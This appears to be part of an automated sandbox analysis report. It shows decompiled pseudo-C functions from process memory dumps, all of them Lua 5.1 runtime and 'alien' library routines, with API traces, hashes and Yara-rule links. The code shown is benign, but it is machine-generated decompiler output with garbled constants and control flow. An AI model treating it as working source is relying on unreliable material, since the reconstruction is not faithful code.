Opcode Fuzzy Hash: d86e069ce187896570404189fd49b1180934dc9683d429a05b637f5348acb865
Instruction Fuzzy Hash: 1011E2F3A003166BC701DE19EC4182F7399FBD4B04F090A2EF859A7281E735D90487A6

Uniqueness

Uniqueness Score: -1.00%

Function 10006300, Relevance: 10.6, APIs: 7, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E10006300(void* __eflags, intOrPtr _a4, intOrPtr _a8) {

				_t44 = _a8;
				_t43 = _a4;
				_t3 = _t44 + 0x2c; // 0x8c48300
				_t4 = _t44 + 0xc; // 0x83fffffc
				E100088D0(_a4,  *_t4,  *_t3 << 2, 0);
				_t5 = _t44 + 0x34; // 0xe8515004
				_t6 = _t44 + 0x10; // 0x8bc308c4
				E100088D0(_a4,  *_t6,  *_t5 << 2, 0);
				_t7 = _t44 + 0x28; // 0x5bace8
				_t8 = _t44 + 8; // 0x9ae85150
				E100088D0(_a4,  *_t8,  *_t7 << 4, 0);
				_t9 = _t44 + 0x30; // 0x244c8bc3
				_t10 = _t44 + 0x14; // 0x50042454
				E100088D0(_t43,  *_t10,  *_t9 << 2, 0);
				_t11 = _t44 + 0x38; // 0x504d
				_t14 = _t44 + 0x18; // 0xfacbe852
				E100088D0(_t43,  *_t14,  *_t11 +  *_t11 * 2 << 2, 0);
				_t15 = _t44 + 0x24; // 0x50082444
				_t16 = _t44 + 0x1c; // 0xc483ffff
				E100088D0(_t43,  *_t16,  *_t15 << 2, 0);
				return E100088D0(_t43, _a8, 0x4c, 0);
			}

0x10006301
0x10006306
0x1000630a
0x1000630d
0x10006318
0x1000631d
0x10006320
0x1000632b
0x10006330
0x10006333
0x1000633e
0x10006343
0x10006346
0x10006351
0x10006356
0x1000635f
0x1000636a
0x1000636f
0x10006372
0x1000637d
0x10006392

APIs

luaM_realloc_.LUA5.1(100066F7,83FFFFFC,08C48300,00000000,?,?,100066F7,?,00000000), ref: 10006318
luaM_realloc_.LUA5.1(100066F7,8BC308C4,E8515004,00000000,100066F7,83FFFFFC,08C48300,00000000,?,?,100066F7,?,00000000), ref: 1000632B
luaM_realloc_.LUA5.1(100066F7,9AE85150,005BACE8,00000000,100066F7,8BC308C4,E8515004,00000000,100066F7,83FFFFFC,08C48300,00000000,?,?,100066F7,?), ref: 1000633E
luaM_realloc_.LUA5.1(100066F7,50042454,244C8BC3,00000000,100066F7,9AE85150,005BACE8,00000000,100066F7,8BC308C4,E8515004,00000000,100066F7,83FFFFFC,08C48300,00000000), ref: 10006351
luaM_realloc_.LUA5.1(100066F7,FACBE852,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 1000636A
luaM_realloc_.LUA5.1(100066F7,C483FFFF,50082444,00000000,100066F7,FACBE852,?,00000000), ref: 1000637D
luaM_realloc_.LUA5.1(100066F7,100066F7,0000004C,00000000,100066F7,C483FFFF,50082444,00000000,100066F7,FACBE852,?,00000000), ref: 10006388

Memory Dump Source

Source File: 00000003.00000002.495890143.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.495868101.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496034889.0000000010017000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496071357.0000000010019000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.496100513.000000001001A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.496130181.000000001001B000.00000002.00020000.sdmp Download File

Similarity

API ID: M_realloc_.
String ID:
API String ID: 3188633865-0
Opcode ID: 67be84d345e7a2a119508ea58c4bf0fe01a75597fd7245af980397e504827614
Instruction ID: 607948920b690979fc6caa6d97f7bd056e3db1fe45c5590825c92f545eafb817
Opcode Fuzzy Hash: 67be84d345e7a2a119508ea58c4bf0fe01a75597fd7245af980397e504827614
Instruction Fuzzy Hash: 1A119A74600B147FF234DA18CC82F37B3B9EBC5B50F50860CF59667685CAA0BD058B65

Uniqueness

Uniqueness Score: -1.00%

Function 00A22C10, Relevance: 10.6, APIs: 7, Instructions: 59
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E00A22C10(intOrPtr* __eax, intOrPtr _a4) {
				intOrPtr* _t5;
				intOrPtr _t7;
				void* _t8;
				intOrPtr* _t9;
				intOrPtr* _t10;
				void* _t11;
				void* _t12;
				void* _t13;

				_t5 = __eax;
				_t7 = _a4;
				_push(0);
				_push(1);
				_push(_t7);
				L00A23F32();
				_push(__eax);
				_push(2);
				_push(_t7);
				L00A23FB0();
				_push(_t7);
				_t9 = __eax;
				_t8 = 3;
				L00A23F38();
				_t12 = _t11 + 0x1c;
				_t10 = __eax;
				if( *__eax == 6) {
					L8:
					return 0;
				} else {
					goto L1;
				}
				do {
					L1:
					if(_t8 > _t10) {
						L6:
						 *_t9 = 0xc;
						 *((intOrPtr*)(_t9 + 4)) = 0;
						goto L7;
					}
					_push(_t8);
					_push(_t7);
					L00A23F4A();
					_t12 = _t12 + 8;
					if(_t5 == 0) {
						goto L6;
					}
					_push(_t8);
					_push(_t7);
					L00A23F50();
					_t13 = _t12 + 8;
					_push(_t8);
					_push(_t7);
					if(_t5 == 0) {
						 *_t9 = 2;
						L00A23F62();
						_t12 = _t13 + 8;
						 *((intOrPtr*)(_t9 + 4)) = _t5;
					} else {
						 *_t9 = 0xc;
						L00A23F0E();
						_t12 = _t13 + 8;
						 *((intOrPtr*)(_t9 + 4)) = _t5;
					}
					L7:
					_t9 = _t9 + 8;
					_t8 = _t8 + 1;
				} while ( *_t9 != 6);
				goto L8;
			}

0x00a22c10
0x00a22c11
0x00a22c18
0x00a22c1a
0x00a22c1c
0x00a22c1d
0x00a22c22
0x00a22c23
0x00a22c25
0x00a22c26
0x00a22c2b
0x00a22c2c
0x00a22c2e
0x00a22c33
0x00a22c38
0x00a22c3e
0x00a22c40
0x00a22ca5
0x00a22ca8
0x00000000
0x00000000
0x00000000
0x00a22c42
0x00a22c42
0x00a22c44
0x00a22c8a
0x00a22c8a
0x00a22c90
0x00000000
0x00a22c90
0x00a22c46
0x00a22c47
0x00a22c48
0x00a22c4d
0x00a22c52
0x00000000
0x00000000
0x00a22c54
0x00a22c55
0x00a22c56
0x00a22c5b
0x00a22c60
0x00a22c61
0x00a22c62
0x00a22c77
0x00a22c7d
0x00a22c82
0x00a22c85
0x00a22c64
0x00a22c64
0x00a22c6a
0x00a22c6f
0x00a22c72
0x00a22c72
0x00a22c97
0x00a22c97
0x00a22c9a
0x00a22c9d
0x00000000

APIs

luaL_checklstring.LUA5.1(?,00000001,00000000), ref: 00A22C1D
luaL_checkudata.LUA5.1(?,00000002,00000000,?,00000001,00000000), ref: 00A22C26
lua_gettop.LUA5.1(?,?,00000002,00000000,?,00000001,00000000), ref: 00A22C33
lua_type.LUA5.1(?,00000003), ref: 00A22C48
lua_isuserdata.LUA5.1(?,00000003), ref: 00A22C56
lua_touserdata.LUA5.1(?,00000003), ref: 00A22C6A
lua_tointeger.LUA5.1(?,00000003), ref: 00A22C7D

Memory Dump Source

Source File: 00000003.00000002.487114164.0000000000A21000.00000020.00020000.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000003.00000002.487089623.0000000000A20000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.487157920.0000000000A25000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.487201925.0000000000A27000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.487230936.0000000000A28000.00000002.00020000.sdmp Download File

Similarity

API ID: L_checklstring.L_checkudata.lua_gettop.lua_isuserdata.lua_tointeger.lua_touserdata.lua_type.
String ID:
API String ID: 1040363586-0
Opcode ID: 0eefe1f94256d347f9853a90c45a6484bfc5985a482e84ee3fe0ac0bed90d0d5
Instruction ID: 45d59b9f7d7665584679de9a6944fbbfd201c199e73453e5f84f5918ba017779
Opcode Fuzzy Hash: 0eefe1f94256d347f9853a90c45a6484bfc5985a482e84ee3fe0ac0bed90d0d5
Instruction Fuzzy Hash: C30180F3D002627AEA302B69BF42F1B7AEC9B51701F15483CF9499A642F67989448731

Uniqueness

Uniqueness Score: -1.00%

Function 10011840, Relevance: 10.6, APIs: 7, Instructions: 53
COMMON

Download Yara Rule

C-Code - Quality: 57%

			E10011840(void* __ecx, void* __eflags, void* __fp0, intOrPtr _a4, intOrPtr _a8) {
				void* __ebx;
				intOrPtr _t7;
				void* _t14;
				intOrPtr _t15;
				void* _t16;
				void* _t17;
				intOrPtr _t18;

				_t16 = __ecx;
				_t18 = _a4;
				_t17 = E1000F5C0(__eflags, __fp0, _t18, 2);
				E1000F410(_t14, __eflags, _t18, 1, 6);
				if(E10001460(__eflags, _t18, 1) == 0) {
					_t15 = _a8;
					_push(_t17);
					__eflags = _t15;
					_push(1);
					_push(_t18);
					if(__eflags == 0) {
						_t7 = E100025B0(__eflags);
					} else {
						_t7 = E100024F0(__eflags);
					}
					__eflags = _t7;
					if(_t7 != 0) {
						__eflags = (E10001980(_t16, _t18, _t7) | 0xffffffff) - _t15;
						E100012B0((E10001980(_t16, _t18, _t7) | 0xffffffff) - _t15, _t18, (E10001980(_t16, _t18, _t7) | 0xffffffff) - _t15);
						return _t15 + 1;
					} else {
						return _t7;
					}
				} else {
					return 0;
				}
			}

0x10011840
0x10011842
0x10011854
0x10011856
0x10011868
0x10011870
0x10011874
0x10011875
0x10011877
0x10011879
0x1001187a
0x10011883
0x1001187c
0x1001187c
0x1001187c
0x1001188b
0x1001188d
0x1001189d
0x100118a1
0x100118af
0x10011892
0x10011892
0x10011892
0x1001186c
0x1001186f
0x1001186f

APIs

luaL_checkinteger.LUA5.1(?,00000002,?,?,?,1001183C,?,00000001), ref: 1001184A

Part of subcall function 1000F5C0: lua_tointeger.LUA5.1(?,?), ref: 1000F5CD
Part of subcall function 1000F5C0: lua_isnumber.LUA5.1(?,?), ref: 1000F5DD

luaL_checktype.LUA5.1(?,00000001,00000006,?,00000002,?,?,?,1001183C,?,00000001), ref: 10011856

Part of subcall function 1000F410: lua_type.LUA5.1(?,?), ref: 1000F41C

lua_iscfunction.LUA5.1(?,00000001,?,00000001,00000006,?,00000002,?,?,?,1001183C,?,00000001), ref: 1001185E
lua_getupvalue.LUA5.1(?,00000001,00000000), ref: 1001187C

Memory Dump Source

Source File: 00000003.00000002.495890143.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.495868101.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496034889.0000000010017000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496071357.0000000010019000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.496100513.000000001001A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.496130181.000000001001B000.00000002.00020000.sdmp Download File

Similarity

API ID: L_checkinteger.L_checktype.lua_getupvalue.lua_iscfunction.lua_isnumber.lua_tointeger.lua_type.
String ID:
API String ID: 2832730387-0
Opcode ID: 7370a4b0c37464c72484586868249f484b823042024b31bf664142abcaee2b47
Instruction ID: 6ca28852b8361b86fe908b338ac70b43fe91d5b09e2b5f8b6dac2d48744cd4e2
Opcode Fuzzy Hash: 7370a4b0c37464c72484586868249f484b823042024b31bf664142abcaee2b47
Instruction Fuzzy Hash: 80F0626A71521026F610E9B86C82FEF139CCFC27E5F144176FA00D90CBEB62E95511B6

Uniqueness

Uniqueness Score: -1.00%

Function 009921F0, Relevance: 10.6, APIs: 7, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 57%

			E009921F0(long long __fp0, intOrPtr _a4, long long* _a8) {
				intOrPtr _v4;
				long long _v8;
				long long _t12;
				intOrPtr _t16;
				long long* _t17;
				long long* _t19;
				long long* _t20;
				void* _t21;

				_t17 = _a8;
				_v4 = 0;
				_t12 =  *((intOrPtr*)(_t17 + 0xc));
				_t16 = _a4;
				_v8 = _t12;
				_t19 =  &_v8 - 8;
				asm("fild qword [esp+0x10]");
				 *_t19 = __fp0;
				_push(2);
				_push(_t16);
				L00994B72();
				L00994BD0();
				_v4 = 0;
				_v8 =  *((intOrPtr*)(_t17 + 8));
				_t20 = _t19 + 8;
				asm("fild qword [esp+0x10]");
				 *((intOrPtr*)(_t17 + 0xc)) = _t12;
				 *_t20 = __fp0;
				_push(3);
				_push(_t16);
				L00994B72();
				L00994BD0();
				_push(4);
				_push(_t16);
				 *((intOrPtr*)(_t17 + 8)) = _t12;
				L00994B84();
				_t21 = _t20 + 0x18;
				if(_t12 != 0) {
					E00992DD0(__fp0);
					_v8 = __fp0;
					_push(4);
					_push(_t16);
					L00994B7E();
					asm("fsubr qword [esp+0x10]");
					_t21 = _t21 + 8;
					 *_t17 = __fp0;
				}
				_push(0x3ff00000);
				_push(0);
				_push(_t16);
				L00994B5A();
				return 1;
			}

0x009921f4
0x009921f8
0x00992201
0x00992204
0x00992208
0x0099220c
0x0099220f
0x00992213
0x00992216
0x00992218
0x00992219
0x0099221e
0x00992226
0x0099222e
0x00992232
0x00992235
0x00992239
0x0099223c
0x0099223f
0x00992241
0x00992242
0x00992247
0x0099224c
0x0099224e
0x0099224f
0x00992252
0x00992257
0x0099225c
0x0099225e
0x00992263
0x00992267
0x00992269
0x0099226a
0x0099226f
0x00992273
0x00992276
0x00992276
0x00992278
0x0099227d
0x0099227f
0x00992280
0x00992292

APIs

luaL_optnumber.LUA5.1(?,00000002), ref: 00992219
_ftol.MSVCRT ref: 0099221E
luaL_optnumber.LUA5.1(?,00000003,?,00000002), ref: 00992242
_ftol.MSVCRT ref: 00992247
lua_isnumber.LUA5.1(?,00000004,?,00000003,?,00000002), ref: 00992252
lua_pushnumber.LUA5.1(?,00000000,3FF00000), ref: 00992280

Part of subcall function 00992DD0: GetSystemTimeAsFileTime.KERNEL32(?,?,?,00000000,BFF00000), ref: 00992DD8

lua_tonumber.LUA5.1(?,00000004), ref: 0099226A

Memory Dump Source

Source File: 00000003.00000002.486716165.0000000000991000.00000020.00020000.sdmp, Offset: 00990000, based on PE: true

Associated: 00000003.00000002.486684810.0000000000990000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.486748403.0000000000995000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.486779033.0000000000996000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.486820104.0000000000997000.00000002.00020000.sdmp Download File

Similarity

API ID: L_optnumber.Time_ftol$FileSystemlua_isnumber.lua_pushnumber.lua_tonumber.
String ID:
API String ID: 3892123499-0
Opcode ID: 0d372b1994056ef207353c7d70b42ddf0d938a42e70fdd4686b09f53f15274d8
Instruction ID: 9035a1ed6d79732e5b87645018f1df2adb48fe716743a51922d56935e7bb5fb6
Opcode Fuzzy Hash: 0d372b1994056ef207353c7d70b42ddf0d938a42e70fdd4686b09f53f15274d8
Instruction Fuzzy Hash: A7016D70504701A7DB21BF29DC42B1EBBE8AFC4715F00885DF9D452281DB75E4298BA7

Uniqueness

Uniqueness Score: -1.00%

Function 00A229E0, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E00A229E0(intOrPtr _a4) {
				void* __ebx;
				void* __esi;
				void* _t7;
				void* _t10;
				intOrPtr _t15;
				intOrPtr* _t16;
				intOrPtr* _t17;
				intOrPtr _t18;
				intOrPtr _t19;
				void* _t20;
				void* _t21;
				void* _t22;
				void* _t23;

				_t18 = _a4;
				_t16 = E00A21110(_t7, 1, _t18, "alien_callback");
				_t22 = _t21 + 4;
				if(_t16 == 0) {
					_push("alien callback expected");
					_push(1);
					_push(_t18);
					L00A23F14();
					_t22 = _t22 + 0xc;
				}
				_t17 =  *_t16;
				_t19 =  *((intOrPtr*)(_t17 + 0x18));
				_push( *((intOrPtr*)(_t19 + 0x3c)));
				_push(0xffffd8f0);
				_push( *((intOrPtr*)(_t19 + 0x38)));
				L00A23FA4();
				_t10 =  *(_t19 + 0x30);
				_t23 = _t22 + 0xc;
				if(_t10 != 0) {
					free(_t10);
					_t23 = _t23 + 4;
				}
				_t20 =  *(_t19 + 0x34);
				if(_t20 != 0) {
					free(_t20);
				}
				_t15 =  *0xa27108; // 0x0
				 *_t17 = _t15;
				 *0xa27108 = _t17;
				return 0;
			}

0x00a229e2
0x00a229f6
0x00a229f8
0x00a229fd
0x00a229ff
0x00a22a04
0x00a22a05
0x00a22a06
0x00a22a0b
0x00a22a0b
0x00a22a0e
0x00a22a10
0x00a22a19
0x00a22a1a
0x00a22a1f
0x00a22a20
0x00a22a25
0x00a22a2e
0x00a22a33
0x00a22a36
0x00a22a38
0x00a22a38
0x00a22a3b
0x00a22a40
0x00a22a43
0x00a22a45
0x00a22a48
0x00a22a4e
0x00a22a50
0x00a22a5b

APIs

Part of subcall function 00A21110: lua_touserdata.LUA5.1(?,00000001,?,00A22DF6,alien_buffer), ref: 00A21113
Part of subcall function 00A21110: lua_getmetatable.LUA5.1(?,00000001), ref: 00A21123
Part of subcall function 00A21110: lua_getfield.LUA5.1(?,FFFFD8F0,?), ref: 00A2113A
Part of subcall function 00A21110: lua_rawequal.LUA5.1(?,000000FF,000000FE,?,FFFFD8F0,?), ref: 00A21144
Part of subcall function 00A21110: lua_settop.LUA5.1(?,000000FD), ref: 00A21153

luaL_argerror.LUA5.1(?,00000001,alien callback expected), ref: 00A22A06
luaL_unref.LUA5.1(?,FFFFD8F0,?), ref: 00A22A20
free.MSVCR80(?), ref: 00A22A36
free.MSVCR80(?), ref: 00A22A43

Strings

alien callback expected, xrefs: 00A229FF
alien_callback, xrefs: 00A229E7

Memory Dump Source

Source File: 00000003.00000002.487114164.0000000000A21000.00000020.00020000.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000003.00000002.487089623.0000000000A20000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.487157920.0000000000A25000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.487201925.0000000000A27000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.487230936.0000000000A28000.00000002.00020000.sdmp Download File

Similarity

API ID: free$L_argerror.L_unref.lua_getfield.lua_getmetatable.lua_rawequal.lua_settop.lua_touserdata.
String ID: alien callback expected$alien_callback
API String ID: 4256076417-575705870
Opcode ID: 9cbdd84702136979748aa6dbad987415609ef8cfd87abb89d811c9853c3b6fec
Instruction ID: ed196a98884ff297b85f2af78eb5a590fc73d7a3ab2eb8e1a5058e0a14f60026
Opcode Fuzzy Hash: 9cbdd84702136979748aa6dbad987415609ef8cfd87abb89d811c9853c3b6fec
Instruction Fuzzy Hash: 95016DB6A416206FD720DB68BE81A6BB3A8FF94360B140834ED45A7B11D634FD16C7E1

Uniqueness

Uniqueness Score: -1.00%

Function 10012A80, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E10012A80(void* __ecx, void* __eflags, void* __fp0, intOrPtr _a4) {
				signed int _t5;
				struct _IO_FILE* _t15;

				_t21 = __eflags;
				_t16 = _a4;
				_t15 = E10012010(__eflags, __fp0, _a4);
				_t5 = E1000F260(__ecx, _a4, 2, "cur", 0x100176ec);
				if(fseek(_t15, E1000F600(_t21, __fp0, _a4, 3, 0),  *(0x100176e0 + _t5 * 4)) == 0) {
					_push(ftell(_t15));
					E10001910(__fp0, _t16);
					return 1;
				} else {
					return E10012160(_t7, __fp0, _t16, 0, 0);
				}
			}

0x10012a80
0x10012a82
0x10012a9a
0x10012a9c
0x10012ac2
0x10012adc
0x10012ade
0x10012aee
0x10012ac4
0x10012ad4
0x10012ad4

APIs

Part of subcall function 10012010: luaL_checkudata.LUA5.1(?,00000001,FILE*,?,?,10011FFB,?), ref: 1001201E
Part of subcall function 10012010: luaL_error.LUA5.1(?,attempt to use a closed file,?,10011FFB,?), ref: 10012033

luaL_checkoption.LUA5.1(?,00000002,cur,100176EC,?), ref: 10012A9C

Part of subcall function 1000F260: luaL_optlstring.LUA5.1(?,?,?,00000000), ref: 1000F279
Part of subcall function 1000F260: lua_pushfstring.LUA5.1(?,invalid option '%s',00000000), ref: 1000F2EA
Part of subcall function 1000F260: luaL_argerror.LUA5.1(?,?,00000000,?,invalid option '%s',00000000), ref: 1000F2F6

luaL_optinteger.LUA5.1(?,00000003,00000000,?,00000002,cur,100176EC,?), ref: 10012AA8

Part of subcall function 1000F600: lua_type.LUA5.1(?,?), ref: 1000F60C

fseek.MSVCRT ref: 10012AB7
ftell.MSVCRT ref: 10012AD6
lua_pushinteger.LUA5.1(?,00000000), ref: 10012ADE

Part of subcall function 10012160: _errno.MSVCRT ref: 10012161
Part of subcall function 10012160: lua_pushboolean.LUA5.1(?,00000001), ref: 10012178

Strings

cur, xrefs: 10012A92

Memory Dump Source

Source File: 00000003.00000002.495890143.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.495868101.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496034889.0000000010017000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496071357.0000000010019000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.496100513.000000001001A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.496130181.000000001001B000.00000002.00020000.sdmp Download File

Similarity

API ID: L_argerror.L_checkoption.L_checkudata.L_error.L_optinteger.L_optlstring._errnofseekftelllua_pushboolean.lua_pushfstring.lua_pushinteger.lua_type.
String ID: cur
API String ID: 1627333882-1502818760
Opcode ID: b652bf847bc5db575f428c0aeb08ec88bcebc80a01ac49077eb0f799364eec42
Instruction ID: 60f10a3ae87ca5838adc34638e3dabbd0b0cf87991ddccf0c75e9592bd84801b
Opcode Fuzzy Hash: b652bf847bc5db575f428c0aeb08ec88bcebc80a01ac49077eb0f799364eec42
Instruction Fuzzy Hash: 78F0E9BE70122077F111D7A86C86FAF236CDF89751F100025F704EA182DAB5EAA152B6

Uniqueness

Uniqueness Score: -1.00%

Function 009912D0, Relevance: 10.5, APIs: 7, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E009912D0(void* __eax, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _t5;
				intOrPtr _t7;
				intOrPtr _t8;

				_t8 = _a4;
				_t7 = _a12;
				_push(_t7);
				_push(_t8);
				L00994B06();
				if(__eax != 0) {
					_t5 = _a8;
					_push(_t5);
					_push(_t8);
					L00994AD0();
					_push(0xfffffffe);
					_push(_t8);
					L00994B36();
					_push(0xffffffff);
					_push(_t8);
					L00994AFA();
					_push(0xfffffffd);
					_push(_t8);
					if(_t5 != 0) {
						L00994AB8();
						_push(_t7);
						_push(_t8);
						L00994AE8();
						return _t5;
					} else {
						L00994AB8();
						return 0;
					}
				} else {
					return __eax;
				}
			}

0x009912d1
0x009912d6
0x009912da
0x009912db
0x009912dc
0x009912e6
0x009912eb
0x009912ef
0x009912f0
0x009912f1
0x009912f6
0x009912f8
0x009912f9
0x009912fe
0x00991300
0x00991301
0x0099130b
0x0099130d
0x0099130e
0x0099131d
0x00991322
0x00991323
0x00991324
0x0099132e
0x00991310
0x00991310
0x0099131c
0x0099131c
0x009912ea
0x009912ea
0x009912ea

APIs

lua_getmetatable.LUA5.1(?,?,?,?,0099126B,?,?,?), ref: 009912DC
lua_pushstring.LUA5.1(?,?), ref: 009912F1
lua_rawget.LUA5.1(?,000000FE,?,?), ref: 009912F9
lua_type.LUA5.1(?,000000FF,?,000000FE,?,?), ref: 00991301
lua_settop.LUA5.1(?,000000FD), ref: 00991310

Memory Dump Source

Source File: 00000003.00000002.486716165.0000000000991000.00000020.00020000.sdmp, Offset: 00990000, based on PE: true

Associated: 00000003.00000002.486684810.0000000000990000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.486748403.0000000000995000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.486779033.0000000000996000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.486820104.0000000000997000.00000002.00020000.sdmp Download File

Similarity

API ID: lua_getmetatable.lua_pushstring.lua_rawget.lua_settop.lua_type.
String ID:
API String ID: 1082009019-0
Opcode ID: 05ca628bde7e9bd8237afd4da71c11217a2c5126cd10d5288cd7a9fab4c45b1c
Instruction ID: 1d1b8b187401e0a5a6f8d8736232e01ef631b973c09229ca6d4c6bdfc6071055
Opcode Fuzzy Hash: 05ca628bde7e9bd8237afd4da71c11217a2c5126cd10d5288cd7a9fab4c45b1c
Instruction Fuzzy Hash: 61F0375394A131365D12B66D7C02EDF229C9DE2331B150769F92492185E604995741FB

Uniqueness

Uniqueness Score: -1.00%

Function 10013B20, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 41
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E10013B20(void* __eflags, void* __fp0, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				void* _t5;
				intOrPtr _t9;
				void* _t11;
				intOrPtr _t12;
				void* _t14;
				void* _t15;

				_t18 = __eflags;
				_t10 = _a8;
				_t13 = _a4;
				E10001B90(_t11, __eflags, _a4, 0xffffffff, _a8);
				_t5 = E10001490(_t18, __fp0, _a4, 0xffffffff);
				_t15 = _t14 + 0x14;
				_t19 = _t5;
				if(_t5 == 0) {
					_t12 = _a12;
					__eflags = _t12;
					if(_t12 >= 0) {
						goto L2;
					} else {
						return E1000F230(_t13, "field \'%s\' missing in date table", _t10);
					}
				} else {
					_t9 = E10001670(_t19, __fp0, _t13, 0xffffffff);
					_t15 = _t15 + 8;
					_t12 = _t9;
					L2:
					E10001160(_t13, 0xfffffffe);
					return _t12;
				}
			}

0x10013b20
0x10013b21
0x10013b26
0x10013b2f
0x10013b37
0x10013b3c
0x10013b3f
0x10013b41
0x10013b61
0x10013b65
0x10013b67
0x00000000
0x10013b69
0x10013b7b
0x10013b7b
0x10013b43
0x10013b46
0x10013b4b
0x10013b4e
0x10013b50
0x10013b53
0x10013b60
0x10013b60

APIs

lua_getfield.LUA5.1(?,000000FF,?,?,?,?,10013A06,?,sec,00000000,?,00000001,?,00000001,00000005), ref: 10013B2F

Part of subcall function 10001B90: luaS_newlstr.LUA5.1(?,?,?,?,?), ref: 10001BBA

lua_isnumber.LUA5.1(?,000000FF,?,000000FF,?,?,?,?,10013A06,?,sec,00000000,?,00000001,?,00000001), ref: 10013B37
lua_tointeger.LUA5.1(?,000000FF,?,00000001,?,00000001,00000005), ref: 10013B46
lua_settop.LUA5.1(?,000000FE,?,00000001,?,00000001,00000005), ref: 10013B53
luaL_error.LUA5.1(?,field '%s' missing in date table,?,?,00000001,?,00000001,00000005), ref: 10013B70

Strings

field '%s' missing in date table, xrefs: 10013B6A

Memory Dump Source

Source File: 00000003.00000002.495890143.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.495868101.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496034889.0000000010017000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496071357.0000000010019000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.496100513.000000001001A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.496130181.000000001001B000.00000002.00020000.sdmp Download File

Similarity

API ID: L_error.S_newlstr.lua_getfield.lua_isnumber.lua_settop.lua_tointeger.
String ID: field '%s' missing in date table
API String ID: 312991915-952653852
Opcode ID: 07fb5b3bd3575b97a1fa9a728a4f571bf4cde2f13739c43dab4e127f142dbf57
Instruction ID: 140a2740226d300b7078e5a87e6315b1a6e34e23a0cce1d8ee73758ee5af6402
Opcode Fuzzy Hash: 07fb5b3bd3575b97a1fa9a728a4f571bf4cde2f13739c43dab4e127f142dbf57
Instruction Fuzzy Hash: F2F082BFA0952037A401D1182C82DEF234CCEC31F5B294325F634A62D7EB25E90602B6

Uniqueness

Uniqueness Score: -1.00%

Function 00A22970, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E00A22970(intOrPtr _a4) {
				void* __ebx;
				void* __esi;
				void* _t5;
				void* _t7;
				void* _t8;
				void* _t11;
				void* _t12;
				intOrPtr _t13;
				void* _t15;
				void* _t16;

				_t13 = _a4;
				_t11 = E00A21110(_t5, 1, _t13, "alien_function");
				_t16 = _t15 + 4;
				if(_t11 == 0) {
					_push("alien function expected");
					_push(1);
					_push(_t13);
					L00A23F14();
					_t16 = _t16 + 0xc;
				}
				_t7 =  *(_t11 + 8);
				if(_t7 != 0) {
					free(_t7);
					_t16 = _t16 + 4;
				}
				_t8 =  *(_t11 + 0x30);
				if(_t8 != 0) {
					free(_t8);
					_t16 = _t16 + 4;
				}
				_t12 =  *(_t11 + 0x34);
				if(_t12 != 0) {
					free(_t12);
				}
				return 0;
			}

0x00a22972
0x00a22986
0x00a22988
0x00a2298d
0x00a2298f
0x00a22994
0x00a22995
0x00a22996
0x00a2299b
0x00a2299b
0x00a2299e
0x00a229a9
0x00a229ac
0x00a229ae
0x00a229ae
0x00a229b1
0x00a229b6
0x00a229b9
0x00a229bb
0x00a229bb
0x00a229be
0x00a229c3
0x00a229c6
0x00a229c8
0x00a229d0

APIs

Part of subcall function 00A21110: lua_touserdata.LUA5.1(?,00000001,?,00A22DF6,alien_buffer), ref: 00A21113
Part of subcall function 00A21110: lua_getmetatable.LUA5.1(?,00000001), ref: 00A21123
Part of subcall function 00A21110: lua_getfield.LUA5.1(?,FFFFD8F0,?), ref: 00A2113A
Part of subcall function 00A21110: lua_rawequal.LUA5.1(?,000000FF,000000FE,?,FFFFD8F0,?), ref: 00A21144
Part of subcall function 00A21110: lua_settop.LUA5.1(?,000000FD), ref: 00A21153

luaL_argerror.LUA5.1(?,00000001,alien function expected), ref: 00A22996
free.MSVCR80(?), ref: 00A229AC
free.MSVCR80(?), ref: 00A229B9
free.MSVCR80(?), ref: 00A229C6

Strings

alien_function, xrefs: 00A22977
